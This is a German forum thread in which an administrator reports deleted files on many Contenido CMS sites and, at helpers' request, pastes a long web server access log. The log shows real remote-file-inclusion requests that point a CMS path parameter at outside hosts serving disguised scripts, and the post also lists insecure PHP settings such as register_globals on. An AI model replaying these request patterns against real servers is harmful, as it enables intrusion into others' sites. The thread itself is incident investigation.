Seite 1 von 2
Hackangriff, sämtliche Daten aus den 777-Verzeichnissen weg
Verfasst: Di 10. Jun 2008, 09:40
von Martin S.
Hallo zusammen, heute wurde ich bzw. meine Kunden Opfer von einem Hackangriff. Sämtliche Dateien aus den 777-Verzeichnissen wurden gelöscht, also upload hat keiner Bilder mehr, css keine Styles und templates keine HTML-Dateien mehr, gesehen habe ich auch, dass der cronjobs-Ordner auf ein aktuelles Erstellungsdatum gesetzt wurde. Hat einer von euch schon solche Erfahrungen gemacht? Es handelt sich bei mir um fast 20 Systeme mit verschiedensten Version von 4.6 bis 4.8, ich habe zwar von allem Backups, aber eine Rücksicherung behebt ja noch nicht das Sicherheitsloch.
Verfasst: Di 10. Jun 2008, 09:54
von Halchteranerin
Waren das neu aufgesetzte 4.6-4.8er, oder solche, die von alten Versionen durch Upgrade aktualisiert wurden? Gibt es Dateien auf dem Server, die nicht dorthin gehören?
Verfasst: Di 10. Jun 2008, 09:58
von tono
Welche Version trägt denn das System das betroffen ist? Oder sind alle 20 betroffen?
Schau in den Webserver Access-Logfiles nach um die Zeit, zu der es passiert ist (cronjobs-Änderungsdatum) um herauszufinden wie die Hacker eingebrochen sind.
Verfasst: Di 10. Jun 2008, 09:58
von Dodger77
Interessant wäre auch die Frage, ob dies bei verschiedenen Webhoster oder evtl. sogar auf genau einem Server passiert ist. Bei den 4.6.x-Versionen kommt es auch auf die genaue Version drauf an.
Kann der Angriffweg durch die Logfiles nachvollzogen werden? Kommt dort folgende Zeichenkette vor:
? Hat der Webhoster schon etwas zu dem Hack gesagt?
Verfasst: Di 10. Jun 2008, 10:00
von tono
Oh, cool
Gleich 3 paralell geschriebene Posts. Da soll einer sagen SICHERHEIT wird hier nicht großgeschrieben
Verfasst: Di 10. Jun 2008, 10:10
von Halchteranerin
tono hat geschrieben:Oh, cool
Gleich 3 paralell geschriebene Posts. Da soll einer sagen SICHERHEIT wird hier nicht großgeschrieben
Verfasst: Di 10. Jun 2008, 10:13
von Martin S.
erst mal danke für die schnelle Reaktion. Die Angriffe sind alle auf einem Server passiert. Hier habe ich einen Ordner cms und dann kunde 1, kunde 2 usw. hier sind in den letzten Jahren diverse Systeme angelegt worden, da manche Kunden für die Sicherheit nicht immer die nötigen Mittel bereitstellen, sind auch nicht immer alles Systeme auf die aktuellsten Versionen gebracht worden, deshalb gibt es hier folgende Versionen 4.6.8, 4.6.15, 4.6.23, 4.8.2.
In den htaccess-Einstellungen gibt es folgendes:
php_flag magic_quotes_gpc on
php_flag register_long_arrays on
php_flag display_errors on
php_flag register_globals on
php_flag allow_call_time_pass_reference on
Die Log-Files des Servers kann ich mir noch nicht ansehen, weil ich keinen Root-Zugriff habe. Aber von der Zeit her sieht es aus als wäre es am 09.06.2008 - 08:15 passiert, weil das der cronjobs-Ordner als Erstellungsdatum hat.
Verfasst: Di 10. Jun 2008, 10:31
von Martin S.
Hab jetzt die Logfiles, wenn ich nach cfg[path][contenido]=http suche bekomme ich folgendes Ergebnis, sorry ist etwas länger. Bin aber nicht gerade ein Fuchs mit der Deutung des Logs, sagt euch das was?!
Code: Alles auswählen
67.228.91.67 - - [01/Jun/2008:04:53:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
67.228.91.67 - - [01/Jun/2008:04:53:47 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
67.228.91.67 - - [01/Jun/2008:04:53:48 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
72.21.38.82 - - [01/Jun/2008:05:24:07 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
72.21.38.82 - - [01/Jun/2008:05:24:08 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
72.21.38.82 - - [01/Jun/2008:05:24:08 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:11 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:12 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:12 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.76"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
58.181.249.244 - - [01/Jun/2008:18:55:12 +0200] "GET /cms/klemm/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible;)"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:31 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:32 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:32 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
213.180.89.68 - - [01/Jun/2008:23:50:22 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
213.180.89.68 - - [01/Jun/2008:23:50:27 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
213.180.89.68 - - [01/Jun/2008:23:50:27 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
203.189.129.129 - - [01/Jun/2008:23:54:57 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.189.129.129 - - [01/Jun/2008:23:54:57 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.0" 404 388 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.38.34.67 - - [01/Jun/2008:23:55:57 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 388 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
218.38.34.67 - - [01/Jun/2008:23:55:57 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 402 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
213.180.89.68 - - [02/Jun/2008:00:07:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
213.180.89.68 - - [02/Jun/2008:00:07:37 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
213.180.89.68 - - [02/Jun/2008:00:07:37 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
200.80.42.159 - - [02/Jun/2008:00:11:54 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
200.80.42.159 - - [02/Jun/2008:00:11:55 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
200.80.42.159 - - [02/Jun/2008:00:11:55 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.25.10.95 - - [02/Jun/2008:00:30:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 402 "-" "Advanced Browser (http://www.avantbrowser.com)"
85.25.10.95 - - [02/Jun/2008:00:30:37 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 388 "-" "Advanced Browser (http://www.avantbrowser.com)"
80.67.26.67 - - [02/Jun/2008:01:40:43 +0200] "GET /cms/klemm/cms/front_content.php//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:40:43 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 403 "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:32 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:33 +0200] "GET /cms/klemm/cms/front_content.php//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:33 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 403 "-" "libwww-perl/5.808"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
72.47.204.44 - - [02/Jun/2008:10:06:43 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
72.47.204.44 - - [02/Jun/2008:10:06:43 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
72.47.204.44 - - [02/Jun/2008:10:06:44 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
217.20.118.202 - - [02/Jun/2008:12:03:31 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
217.20.118.202 - - [02/Jun/2008:12:03:33 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
217.20.118.202 - - [02/Jun/2008:12:03:38 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /cms/klemm/cms/front_content.php/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:52:25 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
70.168.36.247 - - [03/Jun/2008:03:57:49 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://mypoems.kaykelly.net/SMF/Sources/borda2.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.803"
70.168.36.247 - - [03/Jun/2008:03:57:55 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://mypoems.kaykelly.net/SMF/Sources/borda2.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.803"
64.38.8.186 - - [03/Jun/2008:08:17:55 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
64.38.8.186 - - [03/Jun/2008:08:17:55 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
64.38.8.186 - - [03/Jun/2008:08:17:56 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:58 +0200] "GET /cms/klemm/cms/front_content.php?changelang=2/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 200 10304 "-" "libwww-perl/5.79"
66.246.185.183 - - [07/Jun/2008:19:14:18 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
66.246.185.183 - - [07/Jun/2008:19:14:19 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
66.246.185.183 - - [07/Jun/2008:19:14:19 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.227.65.79 - - [07/Jun/2008:20:37:46 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 402 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.227.65.79 - - [07/Jun/2008:20:37:46 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 388 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
